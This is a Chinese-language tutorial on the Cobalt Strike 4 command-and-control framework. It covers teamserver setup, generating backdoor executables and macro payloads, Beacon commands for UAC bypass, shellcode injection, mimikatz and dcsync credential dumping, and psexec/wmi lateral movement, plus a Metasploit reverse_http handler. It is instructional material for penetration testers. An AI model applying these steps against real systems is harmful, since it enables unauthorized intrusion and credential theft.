Cobalt Strike 4 内网渗透工具详细使用教程

一、Cobalt Strike 简介

Cobalt Strike 是一款基于 Metasploit 的 GUI 框架式渗透测试工具，主要用于内网渗透测试和作为 APT 控制终端。主要功能包括：

• 端口转发与服务扫描
• 自动化溢出攻击
• 多模式端口监听
• 多种木马生成（exe、powershell等）
• 钓鱼攻击（站点克隆、目标信息获取、Java执行、浏览器自动攻击等）
• 团队协作功能，允许多个攻击者共享攻击资源和会话

二、环境搭建

1. 服务端启动

关键文件：

• teamserver - 服务端主程序
• cobaltstrike.jar - 客户端程序

启动命令：

sudo ./teamserver <host> <password> [/path/to/c2.profile]

参数说明：

• host：必填，服务器外网IP/域名
• password：必填，客户端连接密码
• [/path/to/c2.profile]：可选，指定C2通信配置文件

示例：

sudo ./teamserver 192.168.1.136 mypassword

2. 客户端连接

1. 运行 cobaltstrike.jar
2. 配置连接参数（与服务端启动配置一致）
3. 点击连接进入主界面

三、界面功能详解

1. 主工具栏

1. 新建链接：支持连接多个服务端
2. 设置：配置控制台界面
3. 可视化：展示控制形式
4. VPN接口：配置VPN
5. 监听器：管理监听配置
6. 脚本管理器：管理第三方脚本

2. 视图功能

1. 应用信息：显示被攻击机器的应用信息
2. 凭证信息：存储通过hashdump或mimikatz获取的密码
3. 文件下载：下载文件功能
4. 日志：事件记录
5. 键盘记录：记录键盘输入
6. 代理信息：显示代理配置
7. 屏幕截图：截取被攻击者屏幕
8. 脚本控制台：脚本命令执行界面
9. 目标：显示目标主机
10. web日志：记录web活动

3. 攻击功能

1. HTML Application：生成恶意HTA木马文件
2. MS Office Macro：生成office宏病毒文件
3. Payload Generator：生成各种语言版本的payload
4. Windows Executable：生成可执行Payload
5. Windows Executable(S)：生成包含多数功能的Stageless可执行文件

Web攻击功能：

1. web服务管理：管理开启的web服务
2. 克隆网站：网站克隆功能
3. 文件下载：提供web下载文件
4. Scripted Web Delivery：提供Web服务便于下载和执行PowerShell Payload
5. 签名Applet攻击：提供自签名Java Applet运行环境
6. 智能攻击：自动检测Java版本并利用已知漏洞绕过安全机制
7. 信息搜集：获取系统信息

四、Beacon 命令详解

Beacon是Cobalt Strike的核心功能模块，提供丰富的命令集：

基本命令

help       显示帮助信息
cd         切换目录
ls         列出文件
pwd        显示当前目录
mkdir      创建目录
rm         删除文件或文件夹
cp         复制文件
mv         移动文件
download   下载文件
upload     上传文件
clear      清除beacon内部任务队列
exit       终止beacon会话
sleep      设置睡眠延迟时间

权限提升

elevate     使用exp提权
getprivs    启用系统权限
getsystem   尝试获取SYSTEM权限
bypassuac   绕过UAC提升权限

进程操作

ps         显示进程列表
kill       结束进程
inject     注入进程生成会话
dllinject  反射DLL注入进程
dllload    使用LoadLibrary加载DLL
shinject   将shellcode注入进程
shspawn    启动进程并注入shellcode

凭证获取

hashdump           转储密码哈希值
logonpasswords     使用mimikatz转储凭据和哈希值
mimikatz           运行mimikatz
wdigest            使用mimikatz转储明文凭据
dcsync             从DC中提取密码哈希
kerberos_ccache_use 从ccache文件导入票据
kerberos_ticket_purge 清除当前会话票据
kerberos_ticket_use 从ticket文件导入票据

横向移动

psexec       使用服务生成会话
psexec_psh   使用PowerShell生成会话
wmi         使用WMI横向渗透
winrm       使用WinRM横向渗透
ssh         使用SSH连接远程主机
ssh-key     使用密钥连接远程主机

其他功能

desktop      远程桌面(VNC)
screenshot   屏幕截图
keylogger    键盘记录
portscan     端口扫描
rportfwd     端口转发
socks        启动SOCKS4代理
covertvpn    部署Covert VPN客户端

五、基本使用流程

1. 创建监听器

Cobalt Strike提供8种监听器：

• beacon_xx系列：Cobalt Strike自身监听器
  • dns
  • http
  • https
  • smb
• foreign系列：外部监听器，用于与MSF或Armitage联动

创建步骤：

1. 点击"监听器"菜单
2. 选择监听器类型
3. 配置监听参数（IP、端口等）
4. 确认创建

2. 生成后门

步骤：

1. 点击"攻击"菜单
2. 选择"生成后门"→"Windows Executable"
3. 选择之前创建的监听器
4. 根据目标系统选择32位或64位
5. 保存生成的exe文件

3. 目标上线

1. 将生成的后门程序上传到目标机器
2. 运行后门程序
3. 在Cobalt Strike界面查看上线主机

4. 提权操作

1. 在上线主机右键菜单
2. 选择"提权"→"uac提权"
3. 成功后会出现新的高权限会话

六、与Metasploit联动

1. MSF端配置

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost 172.16.20.18
msf5 exploit(multi/handler) > set lport 3333
msf5 exploit(multi/handler) > run

2. Cobalt Strike端配置

1. 创建新的监听器
   • payload类型需与MSF端一致
2. 在控制会话中右键
3. 选择"增加会话"，选择MSF的会话

3. 获取meterpreter

成功联动后，可在MSF中获取meterpreter会话，执行：

meterpreter > shell

进入目标主机命令行环境

七、扩展工具 - Ladon脚本

Ladon脚本可增强Cobalt Strike的功能：

• 下载地址：https://github.com/k8gege/Ladon
• 使用文档：https://github.com/k8gege/Aggressor

主要功能：

• 增强命令执行能力
• 提供更多内网渗透功能
• 简化复杂操作流程

八、安全建议

1. 仅用于合法授权的渗透测试
2. 使用后及时清理痕迹
3. 注意工具本身的漏洞和安全更新
4. 在隔离环境中测试和学习

本教程详细介绍了Cobalt Strike 4的核心功能和使用方法，从环境搭建到高级功能联动，涵盖了内网渗透测试的主要技术点。实际使用时请遵守法律法规，仅用于授权测试。